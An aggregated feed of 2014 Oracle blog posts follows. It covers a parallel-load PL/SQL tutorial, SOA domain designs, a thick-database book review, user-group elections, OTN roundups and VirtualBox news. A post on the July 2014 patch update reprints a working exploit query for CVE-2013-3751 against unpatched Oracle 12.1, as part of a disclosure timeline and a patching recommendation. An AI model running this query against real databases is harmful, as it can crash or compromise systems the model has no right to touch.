                 ||i_table_name
                 ||CASE WHEN i_dblink IS NOT NULL THEN '@'||i_dblink END
                 ||chr(10)||
     q'{WHERE  }'||i_column_name||' < '||i_end_id||chr(10)||
     CASE WHEN i_start_id IS NOT NULL THEN q'{AND   }'||i_column_name||' >= '||i_start_id END;
     --
     --DBMS_OUTPUT.PUT_LINE(l_cmd);
     --
     EXECUTE IMMEDIATE l_cmd;
     --
     COMMIT;
     --
  END sid_ipt;
  --
END sid_data_pkg;
/

Next, truncate our target table again.
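The truncate itself is just the obvious one-liner, shown here for completeness:

TRUNCATE TABLE remote_px_test;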

Then create our parallel execute task:

begin
  DBMS_PARALLEL_EXECUTE.CREATE_TASK(task_name => 'PX_TEST_TASK');
end;
/

Create the chunks of work to be executed concurrently:

declare
 l_chunk_sql varchar2(1000);
begin
  l_chunk_sql := q'{select (hi - 1) AS partval, hi }'||chr(10)||
                 q'{from   vw_interval_partitions@d1 v }'||chr(10)||
                 q'{where  table_name = 'REMOTE_PX_TEST' }'||chr(10)||
                 q'{order  by partition_position }';
  DBMS_PARALLEL_EXECUTE.CREATE_CHUNKS_BY_SQL(task_name => 'PX_TEST_TASK',sql_stmt => l_chunk_sql, by_rowid => false);
end;
/

Check our task and our chunks:

select * from dba_parallel_execute_tasks;

TASK_OWNER TASK_NAME    CHUNK_TYPE   STATUS  TABLE_OWNER TABLE_NAME NUMBER_COLUMN TASK_COMMENT JOB_PREFIX SQL_STMT LANGUAGE_FLAG EDITION APPLY_CROSSEDITION_TRIGGER FIRE_APPLY_TRIGGER PARALLEL_LEVEL JOB_CLASS
---------- ------------ ------------ ------- ----------- ---------- ------------- ------------ ---------- -------- ------------- ------- -------------------------- ------------------ -------------- ---------
ME_DBA     PX_TEST_TASK NUMBER_RANGE CHUNKED 
select * from dba_parallel_execute_chunks order by chunk_id;

  CHUNK_ID TASK_OWNER TASK_NAME    STATUS     START_ROWID END_ROWID START_ID END_ID   JOB_NAME START_TS END_TS ERROR_CODE ERROR_MESSAGE
---------- ---------- ------------ ---------- ----------- --------- -------- -------- -------- -------- ------ ---------- -------------
      3053 ME_DBA     PX_TEST_TASK UNASSIGNED                       20120100 20120101 
      3054 ME_DBA     PX_TEST_TASK UNASSIGNED                       20120101 20120102 
        ...
      4017 ME_DBA     PX_TEST_TASK UNASSIGNED                       20140821 20140822 

 965 rows selected 

Then we run our parallel tasks thus, each executing the helper package and working on individual partitions:

set serveroutput on
DECLARE
  l_task     VARCHAR2(24) := 'PX_TEST_TASK';
  l_sql_stmt VARCHAR2(1000);
BEGIN
  --
  l_sql_stmt := q'{begin sid_data_pkg.sid_ipt ('REMOTE_PX_TEST','ME_DBA','DT','D1',:start_id,:end_id); end;}';
  --
  DBMS_PARALLEL_EXECUTE.RUN_TASK(l_task, l_sql_stmt, DBMS_SQL.NATIVE,parallel_level => 16);
  --
  dbms_output.put_line(DBMS_PARALLEL_EXECUTE.TASK_STATUS(l_task));
  --
end;
/

This executed in 2 minutes and returned code 6 which is FINISHED (without error).

Status of individual chunks can be checked via DBA_PARALLEL_EXECUTE_CHUNKS.
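For example, a couple of quick checks against that view, plus the task clean-up call, might look like this (a sketch using the task name created above):

SELECT status, COUNT(*)
FROM   dba_parallel_execute_chunks
WHERE  task_name = 'PX_TEST_TASK'
GROUP  BY status;

SELECT chunk_id, start_id, end_id, error_code, error_message
FROM   dba_parallel_execute_chunks
WHERE  task_name = 'PX_TEST_TASK'
AND    status = 'PROCESSED_WITH_ERROR';

-- Once finished with the task, drop it to tidy up the metadata
exec DBMS_PARALLEL_EXECUTE.DROP_TASK('PX_TEST_TASK')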


Oracle 12C - In-Memory Option Resources

Karl Reitschuster - Wed, 2014-08-20 23:17

Hi folks,

Introduced as a database option, Oracle's In-Memory option will change the world of databases, much as SAP HANA does. The release has been out since July, but resources and documentation are still hard to find.

Here some useful links I found.

First the Home of Oracle In-Memory

Slicing the EDG

Antony Reynolds - Tue, 2014-08-19 20:24
Different SOA Domain Configurations

In this blog entry I would like to introduce three different configurations for a SOA environment.  I have omitted load balancers and OTD/OHS as they introduce a whole new round of discussion.  For each possible deployment architecture I have identified some of the advantages.

Super Domain

This is a single EDG style domain for everything needed for SOA/OSB.   It extends the standard EDG slightly but otherwise assumes a single “super” domain.

This is basically the SOA EDG.  I have broken out JMS servers and Coherence servers to improve scalability and reduce dependencies.

Key Points

  • Separate JMS allows those servers to be kept up separately from rest of SOA Domain, allowing JMS clients to post messages even if rest of domain is unavailable.
  • JMS servers are only used to host application specific JMS destinations, SOA/OSB JMS destinations remain in relevant SOA/OSB managed servers.
  • Separate Coherence servers allow OSB cache to be offloaded from OSB servers.
  • Use of Coherence by other components as a shared infrastructure data grid service.
  • Coherence cluster may be managed by WLS but more likely run as a standalone Coherence cluster.
Benefits
  • Single Administration Point (1 Admin Server)
  • Closely follows EDG with addition of application specific JMS servers and standalone Coherence servers for OSB caching and application specific caches.
  • Coherence grid can be scaled independent of OSB/SOA.
  • JMS queues provide for inter-application communication.
Drawbacks
  • Patching is an all or nothing affair.
  • Startup time for SOA may be slow if large number of composites deployed.
Multiple Domains

This extends the EDG into multiple domains, allowing separate management and update of these domains.  I see this type of configuration quite often with customers, although some don't have OWSM, others don't have separate Coherence etc.

SOA & BAM are kept in the same domain as little benefit is obtained by separating them.

Key Points

  • Separate JMS allows those servers to be kept up separately from rest of SOA Domain, allowing JMS clients to post messages even if other domains are unavailable.
  • JMS servers are only used to host application specific JMS destinations, SOA/OSB JMS destinations remain in relevant SOA/OSB managed servers.
  • Separate Coherence servers allow OSB cache to be offloaded from OSB servers.
  • Use of Coherence by other components as a shared infrastructure data grid service.
  • Coherence cluster may be managed by WLS but more likely run as a standalone Coherence cluster.
Benefits
  • Follows EDG but in separate domains and with addition of application specific JMS servers and standalone Coherence servers for OSB caching and application specific caches.
  • Coherence grid can be scaled independent of OSB/SOA.
  • JMS queues provide for inter-application communication.
  • Patch lifecycle of OSB/SOA/JMS are no longer lock stepped.
  • JMS may be kept running independently of other domains, allowing applications to insert messages for later consumption by SOA/OSB.
  • OSB may be kept running independent of other domains, allowing service virtualization to continue independent of other domains availability.
  • All domains use same OWSM policy store (MDS-WSM).
Drawbacks
  • Multiple domains to manage and configure.
  • Multiple Admin servers (single view requires use of Grid Control)
  • Multiple Admin servers/WSM clusters waste resources.
  • Additional homes needed to enjoy benefits of separate patching.
  • Cross domain trust needs setting up to simplify cross domain interactions.
  • Startup time for SOA may be slow if large number of composites deployed.
Shared Service Environment

This model extends the previous multiple domain arrangement to provide a true shared service environment.

This extends the previous model by allowing multiple additional SOA domains and/or other domains to take advantage of the shared services.  Only one non-shared domain is shown, but there could be multiple, allowing groups of applications to share patching independent of other application groups.

Key Points

  • Separate JMS allows those servers to be kept up separately from rest of SOA Domain, allowing JMS clients to post messages even if other domains are unavailable.
  • JMS servers are only used to host application specific JMS destinations, SOA/OSB JMS destinations remain in relevant SOA/OSB managed servers.
  • Separate Coherence servers allow OSB cache to be offloaded from OSB servers.
  • Use of Coherence by other components as a shared infrastructure data grid service
  • Coherence cluster may be managed by WLS but more likely run as a standalone Coherence cluster.
  • Shared SOA Domain hosts
    • Human Workflow Tasks
    • BAM
    • Common "utility" composites
  • Single OSB domain provides "Enterprise Service Bus"
  • All domains use same OWSM policy store (MDS-WSM)
Benefits
  • Follows EDG but in separate domains and with addition of application specific JMS servers and standalone Coherence servers for OSB caching and application specific caches.
  • Coherence grid can be scaled independent of OSB/SOA.
  • JMS queues provide for inter-application communication.
  • Patch lifecycle of OSB/SOA/JMS are no longer lock stepped.
  • JMS may be kept running independently of other domains, allowing applications to insert messages for later consumption by SOA/OSB.
  • OSB may be kept running independent of other domains, allowing service virtualization to continue independent of other domains availability.
  • All domains use same OWSM policy store (MDS-WSM).
  • Supports large numbers of deployed composites in multiple domains.
  • Single URL for Human Workflow end users.
  • Single URL for BAM end users.
Drawbacks
  • Multiple domains to manage and configure.
  • Multiple Admin servers (single view requires use of Grid Control)
  • Multiple Admin servers/WSM clusters waste resources.
  • Additional homes needed to enjoy benefits of separate patching.
  • Cross domain trust needs setting up to simplify cross domain interactions.
  • Human Workflow needs to be specially configured to point to shared services domain.
Summary

The alternatives in this blog allow for patching to have different impacts, depending on the model chosen.  Each organization must decide the tradeoffs for itself.  One extreme is to go for the shared services model and have one domain per SOA application.  This requires a lot of administration of the multiple domains.  The other extreme is to have a single super domain.  This makes the entire enterprise susceptible to an outage at the same time due to patching or other domain level changes.  Hopefully this blog will help your organization choose the right model for you.

★ Database as a Storage (DBaaS) vs. Thick Database

Eddie Awad - Mon, 2014-08-18 08:30

A recent addition to my Oracle PL/SQL library is the book Oracle PL/SQL Performance Tuning Tips & Techniques by Michael Rosenblum and Dr. Paul Dorsey.

I agree with Steven Feuerstein’s review that “if you write PL/SQL or are responsible for tuning the PL/SQL code written by someone else, this book will give you a broader, deeper set of tools with which to achieve PL/SQL success”.

In the foreword of the book, Bryn Llewellyn writes:

The database module should be exposed by a PL/SQL API. And the details of the names and structures of the tables, and the SQL that manipulates them, should be securely hidden from the application server module. This paradigm is sometimes known as “thick database.” It sets the context for the discussion of when to use SQL and when to use PL/SQL. The only kind of SQL statement that the application server may issue is a PL/SQL anonymous block that invokes one of the API’s subprograms.

I subscribe to the thick database paradigm. The implementation details of how a transaction is processed and where the data is stored in the database should be hidden behind PL/SQL APIs. Java developers do not have to know how the data is manipulated or the tables where the data is persisted; they just have to call the API.
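As a minimal sketch of what such an API looks like (the package, procedure, table and sequence names here are hypothetical, not taken from the book):

CREATE OR REPLACE PACKAGE order_api AS
  -- The only database interface the application server sees
  PROCEDURE place_order (
    p_customer_id IN  NUMBER,
    p_product_id  IN  NUMBER,
    p_quantity    IN  NUMBER,
    p_order_id    OUT NUMBER);
END order_api;
/

CREATE OR REPLACE PACKAGE BODY order_api AS
  PROCEDURE place_order (
    p_customer_id IN  NUMBER,
    p_product_id  IN  NUMBER,
    p_quantity    IN  NUMBER,
    p_order_id    OUT NUMBER)
  IS
  BEGIN
    -- Table names, sequences and SQL stay hidden inside the package body
    INSERT INTO orders (order_id, customer_id, product_id, quantity)
    VALUES (orders_seq.NEXTVAL, p_customer_id, p_product_id, p_quantity)
    RETURNING order_id INTO p_order_id;
  END place_order;
END order_api;
/

The application server then only ever issues an anonymous block such as BEGIN order_api.place_order(:cust, :prod, :qty, :order_id); END; and never references the ORDERS table directly.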

However, like Bryn, I have seen many projects where all calls to the database are implemented as SQL statements that directly manipulate the application’s database tables. The manipulation is usually done via an ORM framework such as Hibernate.

In the book, the authors share a particularly bad example of this design. A single request from a client machine generated 60,000 round-trips from the application server to the database. They explain the reason behind this large number:

Java developers who think of the database as nothing more than a place to store persistent copies of their classes use Getters and Setters to retrieve and/or update individual attributes of objects. This type of development can generate a round-trip for every attribute of every object in the database. This means that inserting a row into a table with 100 columns results in a single INSERT followed by 99 UPDATE statements. Retrieving this record from the database then requires 100 independent queries in the application server.

Wow! That’s bad. Multiply this by 100 concurrent requests and users will start complaining about a “slow database”. NoSQL to the rescue!

© Eddie Awad's Blog, 2014.

UKOUG 2014 Elections

Doug Burns - Sat, 2014-08-16 18:18
I noticed from Debra Lilley's blog post that there are some UKOUG elections at the moment, with voting closing on 1st September 2014.

Although not an active member or supporter of UKOUG any more (at least partly because I'm based in Singapore!), I've had a pretty long association with the user group and a lot of my friends have been involved over the years, so I still take an interest in what's going on there. Even more so this time, because I know two of the candidates pretty well.

Carl Dudley needs no introduction to anyone who has been remotely close to the UK or European OUG scene down the years and is an old mate who has put in a world of time to UKOUG over the years and, as a techie, has always tried to ensure that it remains relevant to all areas of the membership.

Pauline Drummond, on the other hand, will be largely unknown to most of the OUG community as I think she's only been attending events over the past few years. (I may be wrong about that, as my memory isn't what it was for some reason ;-)) I know Pauline pretty well, though, as she was a manager at Standard Life when I worked there on contracts for several years before moving down to London, including being my direct manager for the last contract there. President Elect seems a pretty senior role within UKOUG, but if Pauline applies the same boundless energy and enthusiasm that she always did in the office then I can see her being great at it. She makes me tired just thinking about all of the volunteering and organisation and sport and work stuff she gets through, and she is very dedicated and focussed on working with others to get things done, which strikes me as just what you need from a president of a user group.

For a change it's not one of my techie mates I'm suggesting would be good for the role of President because it is a role that needs to respect and appeal to the entire membership and the other entities that UKOUG has to deal with, not least Oracle, so you need someone with a broad corporate view. Pauline is an appropriate choice in this case, although I can't help hoping that she doesn't antagonise potential conference presenters as UKOUG seems to have done over recent times!

Regardless, I always hope for the best for UKOUG and my various mates who put a power of work into their volunteering and presenting roles, so hopefully some new voices will be a step in the right direction ....

Best of OTN - Week of August 10th

OTN TechBlog - Fri, 2014-08-15 11:12

Brief public service announcement before we get into the OTN community best of content for the week.... Four Bands. Three Epic Nights. Join Oracle for three evenings of entertainment and fun, all during Oracle OpenWorld and JavaOne, September 28-October 2, San Francisco. Learn More

Architect Community

Any discussion of the best of OTN must include the OTN ArchBeat Podcast. Consistently among the top 3 most popular Oracle podcasts, ArchBeat focuses on real conversations with community members. Normally I pick the topics and the guest panelists for each program, but now you have a chance to take over that role and become a Guest Producer. In that role you'll pick the discussion topic and the panelists, while I do all of the grunt work, allowing you to bask in the glory.

Want to know how to become an OTN ArchBeat Podcast Guest Producer? You'll find the details here: Yes, you can take over the OTN ArchBeat Podcast!

And here are two examples of OTN ArchBeat Podcasts produced by community members:

-- OTN Architect Community Manager Bob Rhubart

Database Community

OTN DBA/DEV Watercooler Blog - Did You Say "JSON Support" in Oracle 12.1.0.2?.

-- OTN Database Community Manager Laura Ramsey

Java Community

The Java Source Blog - walkmod : A Tool to Apply Coding Conventions .

Friday Funny: I was worried the #NSA might be spying on me. Thanks, @pacohope.

-- OTN Java Community Manager Tori Weildt

Systems Community

The OTN Systems Community HomePage- Find Great Resources for System Admins and Developers.

-- OTN Systems Community Manager Rick Ramsey

How to beat workday blues?

Vattekkat Babu - Fri, 2014-08-15 06:37

Let us face it - all of us feel like we have achieved or done very little after spending a long day away from family. Then you look back and find that you could've spent at least some of that time with family!

I've been observing my work habits a lot and I think I have found out something that works for me.

I am summarizing these as a NOT-TODO list of 3 items. I am a software engineer by profession and by passion.

Has this worked for me? Absolutely much better than when I was not following these rules.

UnifiedPush Server: Docker, WildFly and another Beta release!

Matthias Wessendorf - Fri, 2014-08-15 04:07

Today we are announcing the second beta release of our 1.0.0 version. This release contains several improvements

  • WildFly 8.x support
  • PostgreSQL fix
  • Scheduler component for deleting analytics older than 30 days
  • Improvements on the AdminUI
  • Documentation

The complete list of included items is available on our JIRA instance.

With the release of the server we also released new versions of the senders for Java and Node.js!

Docker

The team is extremely excited about the work that Docktor Bruno Oliveira did on our new Docker images:

Check them out!

Documentation

As mentioned above, the documentation for the UnifiedPush Server has been reorganized, including an all new guide on how to use the UnifiedPush Server.

Demos

To get easily started using the UnifiedPush Server we have a bunch of demos, supporting various client platforms:

  • Android
  • Apache Cordova (with jQuery and Angular/Ionic)
  • iOS

The simple HelloWorld examples are located here. Some more advanced examples, including a Picketlink secured JAX-RS application, as well as a Fabric8 based Proxy, are available here.

Docker

Bruno Oliveira did Docker images for the Quickstart as well:

Feedback

We hope you enjoy the bits and we do appreciate your feedback! Swing by on our mailing list! We are looking forward to hearing from you!

NOTE: the OpenShift Online offering will be updated within the next day or two.

Enjoy!


Best of OTN - Week of July 27th

OTN TechBlog - Fri, 2014-08-01 13:13
Systems Community - Rick Ramsey, OTN Systems Community Manager -

Tech Article -  Playing with ZFS Snapshots, by ACE Alexandre Borges -
Alexandre creates a ZFS pool, loads it with files, takes a snapshot, verifies that the snapshot worked, removes files from the pool, and finally reverts back to the snapshot file. Then he shows you how to work with snapshot streams. Great way to do backups

From OTN Garage FB - Recently a DBA at an IOUG event complained to Tales from the Data Center that they were unable to install from the Solaris 11.2 ISO. They had seen OpenStack a few weeks ago, and wanted to know how to install Solaris 11.2 in a VM. So guys… here is a step-by-step for you - Tales from the Datacenter.

Java Community - Tori Wieldt, OTN Java Community Manager

Tech Article: Learning Java Programming with BlueJ IDE https://blogs.oracle.com/java/entry/tech_article_learning_java_programming

The Java Source Blog - The Java Hub at JavaOne! Come see the Oracle Technology Network team and see cool demos, interviews, etc.

Friday Funny : "An int and an int sometimes love each other very much and decide to make a long." @asz #jvmls Thanks @stuartmarks !

Database Community - Laura Ramsey, OTN Database Community Manager

OTN DBA/DEV Watercooler Blog - Oracle Database 12c Release 12.1.0.2 is Here! ...with the long-awaited In-Memory option, plus 21 new features. Oracle Database 12c Release 12.1.0.2 supports Linux and Oracle Solaris (SPARC and x86 64 bit).  Read More!

Architect Community - Bob Rhubart, OTN Architect Community Manager
Top 3 Playlists on the OTN ArchBeat YouTube Channel

July Security Alert

Paul Wright - Thu, 2014-07-31 15:25
Hi Oracle Security Folks, The July Oracle Security Alert is out. My part is smaller than last quarter as it is just an In-Depth Credit, but Mr David Litchfield makes a triumphal return with some excellent new research. http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html There is a CVSS 9 and a remote unauthenticated issue in this patch, so it is worth installing this one. [...]

Vamos to the OTN Latin America Tour!

OTN TechBlog - Wed, 2014-07-23 15:33

Rick Ramsey, OTN Systems Community Manager, just wrote a GREAT blog post about the upcoming OTN Latin America Tour! A brief excerpt is below - go to his blog post to see the full schedule and register for this series of events which kicks off August 2nd.

"Oracle User Groups in Latin America, our friends in the Oracle product teams, Oracle ACES, and the Oracle Technology Network have put together a terrific agenda for the 2014 Tour. Hands-on labs, demos, and presentations for developers and deployers of the technologies in the Oracle stack, from applications all the way to systems, including Oracle Database and trending topics such as Big Data. Presenters will be product experts drawn from the Oracle ACE Community and Oracle product teams."


Site Maintenance Complete!

Tim Hall - Sat, 2014-07-19 04:40

It looks like the site maintenance is complete and from my perspective the DNS changes have gone through.

If you go to the homepage and see a message called “Site Maintenance” in the “Site News” section, it means you are being directed to the new server. If you don’t see that it means you are still being directed to the old server and you won’t be able to read this. :)

I guess it will take a few hours for the DNS changes to propagate. Last time I moved the site it took a couple of days to complete for everyone.

Cheers

Tim…


Best Of OTN - Week of July 13th

OTN TechBlog - Fri, 2014-07-18 12:40
Systems Community- Blog - Get Your ZFS On
Five articles explaining how to use ZFS in the real world, by Oracle ACE Alexandre Borges.

Tech Article: Playing with ZFS Encryption -
Oracle Solaris 11 supports native encryption on ZFS so that it can protect critical data without depending on external programs. It's also integrated with the Cryptographic Framework. Alexandre explains the benefits of these and other Oracle Solaris encryption capabilities, and the different methods for encrypting and decrypting files, file systems, and pools.

Article - Building Bridges - Accept the existence of silos in large organizations, but build bridges between them, and incentives to use those bridges, by my colleague Bob Rhubart, manager of OTN's Architect Community.
Organizational silos thwarting IT architecture goals? Put away the sledgehammer.
Java Community - Blog - Oracle releases #JavaSE 8 Update 11 and Java SE 7 Update 65 - Developers can download the latest Java SE JDK and JRE from the Oracle Technology Network.

Java Magazine: The July/August issue of Java Magazine explores the Java Virtual Machine (JVM), and includes a JavaOne preview.

RT @OracleAcademy: Where Are the #Women in Makerspaces? #WomeninSTEM #gendergap #tech - Read more here.

Database Community -

Hey Hey! Oracle has published its Critical Patch Advisory for July 2014. Get it Here. Send to Your Friends!

Web Launch Replay- Oracle Big Data SQL - Bringing Structured Queries to an Unstructured World.  Oracle has just launched Oracle Big Data SQL.  


Pre-Built Developer VMs (for Oracle VM VirtualBox) -

Learning your way around a new software stack is challenging enough without having to spend multiple cycles on the install process. Instead, we have packaged such stacks into pre-built Oracle VM VirtualBox appliances that you can download, install, and experience as a single unit. Just download and assemble the files, import them into VirtualBox (available for free), and go (but not for production use or redistribution)!

Planned Maintenance This Weekend!

Tim Hall - Fri, 2014-07-18 02:14

Just a quick heads-up to you folks…

On Saturday I’ll be transferring my website and blog to a new server. It’s with the same hosting company, so hopefully the DNS changes will not be too drastic.

The site is already in place on the new box and it seems to be working fine, so on Saturday morning I will do a backup of the MySQL databases and transfer them to the new machine, then initiate the DNS change.

The last time I did this, which was between different hosting companies, there were some issues in some geographical regions for a couple of days, but most people were seeing the site as normal within about an hour.

Note. If you happen to post on the forum or comment on a blog post during Saturday, it might be lost depending on the timing. Also, my email address may go wonky for a little while…

Fingers crossed… :)

Cheers

Tim…

 


Oracle CPU July 2014 + Oracle Exploit CVE-2013-3751

Alexander Kornbrust - Wed, 2014-07-16 10:03

Yesterday, Oracle released a new critical patch update (CPU Jul 2014) for July 2014. This CPU contains fixes for 5 database vulnerabilities. The most critical one, CVE-2013-3751, has a base score of 9.0 and affects Oracle 12.1 only. The same issue was already fixed for Oracle 11.2 in July 2013 (CPU Jul 2013).

After a short search on the web (Google and Twitter, less than 5 minutes) I found an exploit for CVE-2013-3751.

This vulnerability was found by Nicolas Grégoire: he released an exploit nearly 1 year after the patch was published by Oracle, but it seems that he was not aware that Oracle had forgotten to fix this issue in Oracle 12.1.

Timeline of CVE-2013-3751:

  • January 2012: Vulnerability found (fuzzing)
  • February 2012: Vulnerability reported to ZDI
  • March 2012: Vulnerability contracted $500
  • November 2012: Reported to Oracle by ZDI
  • July 2013: Patch published by Oracle
  • March 2014: Oracle’s Cloud still not patched
  • June 2014: Exploit released at INS#14 conference
  • July 2014: Patch for Oracle 12.1 published by Oracle

 

Exploit:

———-

select * from dual where xmltype(q'{<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
abbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbcccccccccccccccccccccccccccccccccccccccccccccccc
ddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
ffffffffffffffffffffffffffffffffffffffffffffffffhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
iiiiiiiiiiiiiiiiiiiiiiiiii foo="bar[a &lt; b]"/>}') like '0wn3d_again';

———-
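A quick way to confirm whether a given database already has the fix applied is to look at the patch history recorded in the data dictionary (a sketch; the exact COMMENTS text depends on how the CPU/PSU was applied):

SELECT action_time, action, version, comments
FROM   dba_registry_history
ORDER  BY action_time;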

VirtualBox 4.3.14

Tim Hall - Wed, 2014-07-16 07:23

Oracle have given birth to VirtualBox 4.3.14. Mother and baby are doing well, with the downloads and changelog in the usual places.

Happy upgrading…

Cheers

Tim…

PS. Looks like the baby might be still-born. Fails pretty badly on Windows 7 at the moment…

PPS. Seems to work fine on Mac and Linux (Fedora 20)…
